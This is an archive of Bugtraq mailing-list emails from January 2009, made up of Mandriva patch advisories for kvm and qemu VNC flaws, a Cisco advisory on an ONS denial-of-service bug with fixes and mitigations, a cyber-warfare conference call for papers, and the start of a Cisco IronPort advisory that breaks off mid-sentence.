dGNoLXVwZGF0ZXMvY3B1amFuMjAwOS5odG1sIA0KDQoNCg0KQ3JlZGl0cw0KKioqKioqKg0K
DQpPcmFjbGUgZ2l2ZSBhIGNyZWRpdHMgZm9yIEFsZXhhbmRlciBQb2x5YWtvdiBmcm9tIERp
Z2l0YWwgU2VjdXJpdHkgQ29tcGFueSBpbiBTZWN1cml0eS1Jbi1EZXB0aCBwcm9ncmFtIG9m
IENQVSBKYW51YXJ5IDIwMDkuDQoNCmh0dHA6Ly93d3cub3JhY2xlLmNvbS90ZWNobm9sb2d5
L2RlcGxveS9zZWN1cml0eS9jcml0aWNhbC1wYXRjaC11cGRhdGVzL2NwdWphbjIwMDkuaHRt
bCANCg0KDQoNCg0KQWJvdXQNCioqKioqDQoNCkRpZ2l0YWwgU2VjdXJpdHkgaXMgbGVhZGlu
ZyBJVCBzZWN1cml0eSBjb21wYW55IGluIFJ1c3NpYSwgcHJvdmlkaW5nIGluZm9ybWF0aW9u
IHNlY3VyaXR5IGNvbnN1bHRpbmcsIGF1ZGl0IGFuZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHNl
cnZpY2VzLCByaXNrIGFuYWx5c2lzIGFuZCBJU01TLXJlbGF0ZWQgc2VydmljZXMgYW5kIGNl
cnRpZmljYXRpb24gZm9yIElTTy9JRUMgMjcwMDE6MjAwNSBhbmQgUENJIERTUyBzdGFuZGFy
ZHMuIERpZ2l0YWwgU2VjdXJpdHkgUmVzZWFyY2ggR3JvdXAgZm9jdXNlcyBvbiB3ZWIgYXBw
bGljYXRpb24gYW5kIGRhdGFiYXNlIHNlY3VyaXR5IHByb2JsZW1zIHdpdGggdnVsbmVyYWJp
bGl0eSByZXBvcnRzLCBhZHZpc29yaWVzIGFuZCB3aGl0ZXBhcGVycyBwb3N0ZWQgcmVndWxh
cmx5IG9uIG91ciB3ZWJzaXRlLg0KDQoNCkNvbnRhY3Q6CXJlc2VhcmNoIFthdF0gZHNlYyBb
ZG90XSBydQ0KCQlodHRwOi8vd3d3LmRzZWNyZy5ydSANCgkJaHR0cDovL3d3dy5kc2VjLnJ1
DQoNCg0KDQoNCg0KDQoNCg0K
------------BBCA1ED38A711B4--


From - Wed Jan 14 13:42:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058de
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39166-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7EE13EC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:39:35 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 656F32373BE; Wed, 14 Jan 2009 09:17:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25564 invoked from network); 14 Jan 2009 05:27:07 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=EKBufSk_EuGl58KlfjUA:9 a=IcExLSFhFvKvyMFPllwA:7 a=PFJxnJKnbqrnCZpBqJX4TsXuAMwA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:009 ] kvm
Date: Tue, 13 Jan 2009 22:57:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMykP-0004lZ-18@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:009
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : kvm
 Date    : January 14, 2009
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Security vulnerabilities have been discovered and corrected in
 VNC server of kvm version 79 and earlier, which could lead to
 denial-of-service attacks (CVE-2008-2382), and make it easier for
 remote crackers to guess the VNC password (CVE-2008-5714).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 acdff9c09970bba49f5b500723092f2b  2009.0/i586/kvm-74-3.1mdv2009.0.i586.rpm 
 8ee1433de23a7fec8bc768a66585368c  2009.0/SRPMS/kvm-74-3.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 b84f9ff6c8005e7de6996b3e1f04335d  2009.0/x86_64/kvm-74-3.1mdv2009.0.x86_64.rpm 
 8ee1433de23a7fec8bc768a66585368c  2009.0/SRPMS/kvm-74-3.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbVRimqjQ0CJFipgRAoEPAJ0dZtxXkpX7Ft2YHREKrePd7QV9WgCg827W
ha/fMpm4QxG0vwCrbHMLjK4=iT86
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058df
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39175-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 97972EC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:43:40 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id EF511143932; Wed, 14 Jan 2009 09:34:22 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3081 invoked from network); 14 Jan 2009 15:57:04 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco ONS Platform Crafted Packet Vulnerability
Date: Wed, 14 Jan 2009 17:00:00 +0100
Message-id: <200901141701.ons@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report: 
Content-Return: Prohibited
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco ONS Platform Crafted Packet
Vulnerability

Advisory ID: cisco-sa-20090114-ons

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

- ---------------------------------------------------------------------

Summary
======
The Cisco ONS 15300 series Edge Optical Transport Platform, the Cisco
ONS 15454 Optical Transport Platform, the Cisco ONS 15454 SDH
Multiservice Platform, and the Cisco ONS 15600 Multiservice Switching
Platform contains a vulnerability when processing TCP traffic streams
that may result in a reload of the device control card.

Cisco has released free software updates that address this
vulnerability.

There are no workarounds that mitigate this vulnerability. Several
mitigations exist that can limit the exposure of this vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

Affected Products
================
Vulnerable Products
+------------------

The following Cisco ONS products are vulnerable if running affected
software versions:

  * Cisco ONS 15310-CL and 15310-MA
  * Cisco ONS 15327
  * Cisco ONS 15454 and 15454 SDH
  * Cisco ONS 15600

Consult the section "Software Versions and Fixes" within this
advisory for affected software versions. To determine your software
version, view the Help > About window on the CTC management
software).

Products Confirmed Not Vulnerable
+--------------------------------

The following Cisco ONS products are confirmed not vulnerable:

  * Cisco ONS 15800 Series
  * Cisco ONS 15500 Series Extended Service Platform
  * Cisco ONS 15302
  * Cisco ONS 15305
  * Cisco ONS 15200 Series Metro DWDM Systems
  * Cisco ONS 15190 Series IP Transport Concentrator

No other Cisco products are currently known to be affected by this
vulnerability.

Details
======
The affected Cisco 15310-CL, 15310-MA, ONS 15327, ONS 15454, ONS
15454 SDH, and ONS 15600 hardware is managed through the CTX,
CTX2500, XTC, TCC/TCC+/TCC2/TCC2P, TCCi/TCC2/TCC2P, and TSC control
cards respectively. These control cards are usually connected to a
Data Communications Network (DCN). In this context the term DCN is
used to denote the network that transports management information
between a management station and the network entity (NE). This
definition of DCN is sometimes referred to as Management
Communication Network (MCN). The DCN is usually physically or
logically separated from the optical data network and isolated from
the Internet. This limits the exposure to the exploitation of this
vulnerability from the Internet.

A crafted stream of TCP traffic to the control cards on a node will
result in a reset of the corresponding control cards on this node. A
complete 3-way handshake is required on any open TCP port to be able
to exploit this vulnerability.

The timing for the data channels traversing the switch is provided by
the control cards.

When an active and a standby Cisco ONS 15310-MA, ONS 15310-CL, ONS
15327, ONS 15454 or ONS 15454 SDH control card reloads at the same
time, the synchronous data channels traversing the switch drop
traffic until the card comes back online. Asynchronous data channels
traversing the switch are not impacted. Manageability functions
provided by the network element using the CTX, CTX2500, XTC or TCC/
TCC+/TCC2/TCC2P control cards are not available until the control
card comes back online.

On the Cisco ONS 15600 hardware, whenever both the active and standby
control cards are rebooting at the same time, there is no impact to
the data channels traversing the switch because the TSC performs a
software reset which does not impact the timing being provided by the
TSC for the data channels.

Manageability functions provided by the network element through the
TSC control cards are not available until the control card comes back
online.

This vulnerability is documented in Cisco bug ID CSCsr41128 
and has been assigned Common Vulnerabilities and Exposures (CVE) 
identifier CVE-2008-3818.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

CVSS Base Score - 7.8

  Access Vector         : Network
  Access Complexity     : Low
  Authentication        : None
  Confidentiality Impact: None
  Integrity Impact      : None
  Availability Impact   : Complete

CVSS Temporal Score - 6.4

  Exploitability        : Functional
  Remediation Level     : Official-Fix
  Report Confidence     : Confirmed

Impact
=====
Successful exploitation of this vulnerability will result in a reset
of the node's control card. Repeated attempts to exploit this
vulnerability could result in a sustained DoS condition, dropping the
synchronous data channels traversing the switch (Cisco ONS 15310-MA,
ONS 15310-CL, ONS 15327, ONS 15454, ONS 15454 SDH) and preventing
manageability functions provided by the network element control cards
(all ONS switches) until the control card comes back online.

Software Versions and Fixes
==========================
When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

+-------------------------------------------------------------------------+
| Affected Major Release          | First Fixed Release                   |
|---------------------------------+---------------------------------------|
| 7.0                             | Note: Releases prior to 7.0.2 are not |
|                                 | vulnerable. First fixed in 7.0.7      |
|---------------------------------+---------------------------------------|
| 7.2                             | Note: Releases prior to 7.2.2 are not |
|                                 | vulnerable. First fixed in 7.2.3      |
|---------------------------------+---------------------------------------|
| 8.0                             | Vulnerable; migrate to 8.5.3 or       |
|                                 | later.                                |
|---------------------------------+---------------------------------------|
| 8.5                             | Note: Releases prior to 8.5.1 are not |
|                                 | vulnerable. First fixed in 8.5.3      |
|---------------------------------+---------------------------------------|
| 9.0                             | Not vulnerable.                       |
+-------------------------------------------------------------------------+

Note: Releases prior to 7.0 are not affected by this vulnerability.

Workarounds
==========
There are no workarounds for this vulnerability. The following
general mitigation actions help prevent remote exploitation:

  * Isolate DCN:
    Ensuring the DCN is physically or logically separated from the
    customer network and isolated from the Internet will limit the
    exposure to the exploitation of these vulnerabilities from the
    Internet or customer networks.
  * Apply Transit Access Control Lists:
    Apply access control lists (ACLs) on routers / switches /
    firewalls installed in front of the vulnerable network devices
    such that TCP/IP traffic destined for the CTX, CTX2500, XTC, TCC2
    /TCC2+/TCC2P, or TSC control cards on the ONS is allowed only
    from the network management workstations.
    For examples on how to apply ACLs on Cisco routers, refer to the
    white paper "Transit Access Control Lists: Filtering at Your
    Edge", which is available at the following link: 
    http://www.cisco.com/en/US/customer/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml

Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Mitigation Bulletin
companion document for this advisory, which is available at the
following link: 
http://www.cisco.com/warp/public/707/cisco-amb-20090114-ons.shtml

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at 
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at 
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized 
telephone numbers, and instructions and e-mail addresses for use in
various languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was found by reviewing Cisco TAC service requests.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkluC5MACgkQ86n/Gc8U/uCIiwCfb0TgaYDql8VEjtERKMaqgHOm
h0oAniEObgEKjHbo+CHnJxfFFKhCr17o
=7xLg
-----END PGP SIGNATURE-----

From - Wed Jan 14 14:02:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e0
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39167-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 0B666EC122
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:52:47 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0948F2373BC; Wed, 14 Jan 2009 09:18:12 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26763 invoked from network); 14 Jan 2009 06:42:51 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=O7S8s7giyhVwt4s-9NoA:9 a=_ep76ymyat71F24U2foA:7 a=twaoudnO3fsgLv5R-1XwrxcYtS0A:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:010 ] qemu
Date: Wed, 14 Jan 2009 00:13:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMzvx-0005By-0Z@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:010
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : qemu
 Date    : January 14, 2009
 Affected: 2008.0, 2008.1
 _______________________________________________________________________

 Problem Description:

 A security vulnerability have been discovered and corrected
 in VNC server of qemu 0.9.1 and earlier, which could lead to a
 denial-of-service attack (CVE-2008-2382).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 d18f37c8afe834fc75b8d20fd739c35e  2008.0/i586/dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.i586.rpm
 90ac7511cb7b1ef350b0edeaddcbb61c  2008.0/i586/qemu-0.9.0-16.3mdv2008.0.i586.rpm
 14fb383247d38fa1625384e8a5c07106  2008.0/i586/qemu-img-0.9.0-16.3mdv2008.0.i586.rpm 
 7a7c649d2c0e033767a8f891491fa11a  2008.0/SRPMS/qemu-0.9.0-16.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 a199c71663339ff512fc286287aa393f  2008.0/x86_64/dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.x86_64.rpm
 d6ad774c00ab0f8d7583d6903d845bda  2008.0/x86_64/qemu-0.9.0-16.3mdv2008.0.x86_64.rpm
 d7dfcf881def049285be2f22cb430d8b  2008.0/x86_64/qemu-img-0.9.0-16.3mdv2008.0.x86_64.rpm 
 7a7c649d2c0e033767a8f891491fa11a  2008.0/SRPMS/qemu-0.9.0-16.3mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 0b47bf7f27ba348045e167c2e3c69119  2008.1/i586/dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.i586.rpm
 66202d0f349f70cf8ac1289bb5e70708  2008.1/i586/qemu-0.9.0-18.3mdv2008.1.i586.rpm
 b2ed2e31823f48695a97f8bbc506e7f6  2008.1/i586/qemu-img-0.9.0-18.3mdv2008.1.i586.rpm 
 5f7d176cfba6e6b262c14de369eb60e1  2008.1/SRPMS/qemu-0.9.0-18.3mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 2111acd253c95c5633f5389dedf7af1d  2008.1/x86_64/dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.x86_64.rpm
 dd1b9f85874c290458fa4b7943c233ee  2008.1/x86_64/qemu-0.9.0-18.3mdv2008.1.x86_64.rpm
 e22ca1a87a2a41f8f306da778b15e5f0  2008.1/x86_64/qemu-img-0.9.0-18.3mdv2008.1.x86_64.rpm 
 5f7d176cfba6e6b262c14de369eb60e1  2008.1/SRPMS/qemu-0.9.0-18.3mdv2008.1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbWPlmqjQ0CJFipgRAnvHAJoD0Inft9/2qDupdRM8u0nBQs81bgCgo28B
qXNv6NOXGtRSPKGNS0Acc3o=DHda
-----END PGP SIGNATURE-----

From - Wed Jan 14 14:12:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39168-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B9C08EC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 14:03:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 968182373C0; Wed, 14 Jan 2009 09:18:48 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28215 invoked from network); 14 Jan 2009 07:45:12 -0000
Date: 14 Jan 2009 08:08:57 -0000
Message-ID: <20090114080857.2258.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: kgconference@gmail.com
To: bugtraq@securityfocus.com
Subject: Call for Papers: Cyber Warfare
Status:   

-----

Call for Papers!

Conference on Cyber Warfare

June 17-19, 2009

Tallinn, Estonia

The Cooperative Cyber Defence Centre of Excellence is hosting a Conference on Cyber Warfare in 2009.  

CCD CoE is soliciting research papers within the emerging field of cyber warfare, including but not limited to the following topics:

#  Concepts and Doctrine
#  Technical Challenges and Solutions
#  Strategic Analysis
#  Cooperative Cyber Defence
#  Lessons Learned
#  Proofs of Concept
#  The Future

The Selection Committee seeks submissions from academia and the professional world that offer an original and substantial contribution toward understanding conflict in cyberspace.

Authors should send a one-page abstract to cfp@ccdcoe.org between January 1 and March 15, 2009.

The Selection Committee will notify all authors of its decisions ASAP following submission but NLT April 1.

Final papers are due May 15, 2009.  They will be presented at the conference by the author and published in the conference proceedings.

Keynote Speakers include:
James Lewis (CSIS) "Securing Cyberspace for the 44th Presidency"
Mikko Hypponen (F-Secure) Chief Research Officer

Conference registration information will be posted by February 1 at www.ccdcoe.org.

Questions regarding this conference may be sent to cwcon@ccdcoe.org from January 1, 2009. 

Conference Manager:

Kenneth Geers, CCD CoE Scientist

-----

From - Wed Jan 14 14:12:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39176-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 14E78EC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 14:12:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 8A535236F9F; Wed, 14 Jan 2009 10:51:05 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9379 invoked from network); 14 Jan 2009 16:48:27 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: IronPort Encryption Appliance / PostX and PXE Encryption Vulnerabilities
Date: Wednesday, 14 January 2009 11:15:00 -0600 
Message-id: <200901141115.ironport@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report: 
Content-Return: Prohibited
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: IronPort Encryption Appliance / PostX and
                         PXE Encryption Vulnerabilities

Advisory ID: cisco-sa-20090114-ironport

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
======
IronPort PXE Encryption is an e-mail encryption solution that is
designed to secure e-mail communications without the need for a
Public Key Infrastructure (PKI) or special agents on receiving
systems. When an e-mail message is targeted for encryption, the PXE
encryption engine on an IronPort e-mail gateway encrypts the original
e-mail message as an HTML file and attaches it to a notification
e-mail message that is sent to the recipient. The per-message key
used to decrypt the HTML file attachment is stored on a local
IronPort Encryption Appliance, PostX software installation or the
